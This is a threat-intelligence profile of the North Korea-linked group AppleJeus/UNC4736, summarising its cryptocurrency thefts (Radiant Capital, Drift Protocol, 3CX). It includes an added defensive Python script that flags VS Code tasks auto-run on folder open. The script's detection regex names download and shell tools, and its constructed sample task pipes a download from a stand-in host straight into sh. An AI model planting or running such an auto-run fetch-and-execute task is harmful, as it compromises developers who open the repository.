AppleJeus
AppleJeus is a North Korean state-affiliated threat actor also tracked as UNC4736 and Citrine Sleet, with further aliases including Gleaming Pisces, Labyrinth Chollima, Golden Chollima, Nickel Academy, and DEV-0139/DEV-1222. Multiple sources in the reporting collected here assess the group as operating with a DPRK nexus, and Mandiant is cited as assessing with high confidence that it is aligned with North Korea's Reconnaissance General Bureau (RGB). UNC4736 is also described as a sub-cluster within the Lazarus Group.

The actor focuses heavily on cryptocurrency and fintech targets for financial theft. Reported victims include Radiant Capital, Drift Protocol, the 3CX supply chain attack, a European fintech company, and the broader cryptocurrency, DeFi, fintech, and supply-chain vendor ecosystems. The group has targeted the cryptocurrency sector for financial theft since at least 2018, and prior U.S. government reporting describes North Korea using fake cryptocurrency trading platforms to infect victims with AppleJeus malware.

Tradecraft centers on long-running social engineering, supply-chain compromise, and malware-enabled intrusion. In the 2024 Radiant Capital intrusion, attackers used a Telegram impersonation lure to deliver the INLETDRIFT macOS backdoor to hardware-wallet signers, compromising a multisig workflow and stealing about $50 million. In the 2026 Drift Protocol intrusion, the group allegedly spent roughly six months building trust through conference meetings, Telegram conversations, onboarding activity, and a deposited stake before compromising contributors via a malicious code repository and/or a trojanized wallet distributed through Apple TestFlight. The Drift reporting also describes abuse of malicious Visual Studio Code tasks.json behavior, pre-signed durable nonce transactions, manipulated CarbonVote Token collateral, and rapid draining of protocol vaults.

AppleJeus is also linked to the 2023 3CX supply chain attack. Techniques explicitly reported include COLDCAT C2 over HTTPS with data carried in cookie headers, icon files with embedded C2 URLs hosted in a GitHub repository, exploitation of Chrome vulnerability CVE-2022-0609 via a drive-by compromise website, and use of ICONICSTEALER to steal browser information including browser history. Microsoft is additionally reported to have observed Citrine Sleet exploiting a Chromium zero-day in 2024.

Further activity includes fraudulent recruitment and job-themed operations, among them delivery of malicious Python packages via PyPI to deploy PondRAT and POOLRAT/SIMPLESEA-related tooling, which Unit 42 links with moderate confidence to Gleaming Pisces/UNC4736. These campaigns used fake job offers under the broader Operation Dream Job theme and aimed to reach supply-chain vendors through developer endpoints. A separate late-2024 incident involved a fraudulent recruitment scheme delivering malicious Python packages to a European fintech company, followed by lateral movement into cloud resources and diversion of cryptocurrency to attacker-controlled wallets.

Overall, the reporting characterizes AppleJeus/UNC4736/Citrine Sleet as a DPRK-linked, financially motivated state actor specializing in cryptocurrency theft, social engineering, supply-chain compromise, and cross-platform malware operations against crypto, DeFi, fintech, and related technology targets.
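One defensive check suggested by the tasks.json abuse in the Drift reporting, added here as an example and not code from the page or any vendor it cites: it scans a repository's .vscode/tasks.json for tasks configured to run as soon as the folder is opened and flags command lines worth reviewing before the workspace is trusted. It assumes the abuse relied on VS Code's documented runOptions.runOn "folderOpen" auto-run setting, which the page does not spell out; the sample tasks.json is constructed.

```python
"""Flag VS Code tasks.json entries that auto-run on folder open (added defensive example;
assumes the abuse used VS Code's documented runOptions.runOn == "folderOpen" feature)."""
import json
import re

# Command-line constructs worth a closer look when they run without user action.
SUSPICIOUS = re.compile(r"(curl|wget|base64|python|powershell|bash -c|sh -c|\|)", re.I)

def strip_comments(text: str) -> str:
    """Remove // and /* */ comments (tasks.json is JSONC), leaving string literals intact."""
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':  # copy a string literal verbatim, honouring backslash escapes
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith("//", i):  # line comment runs to the newline (kept) or EOF
            i = text.find("\n", i); i = n if i < 0 else i
        elif text.startswith("/*", i):  # block comment runs to the closing */ or EOF
            i = text.find("*/", i + 2); i = n if i < 0 else i + 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)

def find_autorun_tasks(tasks_json_text: str) -> list:
    """Return each folderOpen task with its full command line and a suspicion flag."""
    findings = []
    for task in json.loads(strip_comments(tasks_json_text)).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue  # only tasks that fire without an explicit user action matter here
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": cmd.strip(),
                         "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings

# Constructed sample: a harmless build task plus an auto-run task that pipes a download to sh.
SAMPLE = r'''{
  // constructed for this example; not from any real repository
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", "command": "sh", "runOptions": {"runOn": "folderOpen"},
     "args": ["-c", "curl -s https://example.invalid/setup.sh | sh"]}
  ]
}'''
```

Run `find_autorun_tasks(open(".vscode/tasks.json").read())` against a freshly cloned repository before opening it in VS Code; an empty list means no folder-open tasks are declared.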
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Financial Services
Where they're from
Attributed origin per open-source reporting.
- KP
Tradecraft
53 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
10 malware families attributed to this actor across reporting.
5 additional families tracked in Mallory.
Observables
19 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
17 sources tracked across advisories, community write-ups, and news.
Attributed to the October 2024 compromise of Radiant Capital, in which attackers compromised hardware-wallet signers via the INLETDRIFT macOS backdoor delivered through Telegram impersonation, enabling takeover of the Pool Provider contract and theft of funds.
North Korean threat group using prolonged social engineering operations to steal large sums from cryptocurrency trading platforms.
Conducted a long-running social engineering and infiltration operation against Drift contributors, obtained multisig pre-approvals, and enabled the theft of approximately $285 million from the protocol.
Referenced as a more sophisticated North Korean state-backed threat actor than the cluster behind the exposed IT worker scam.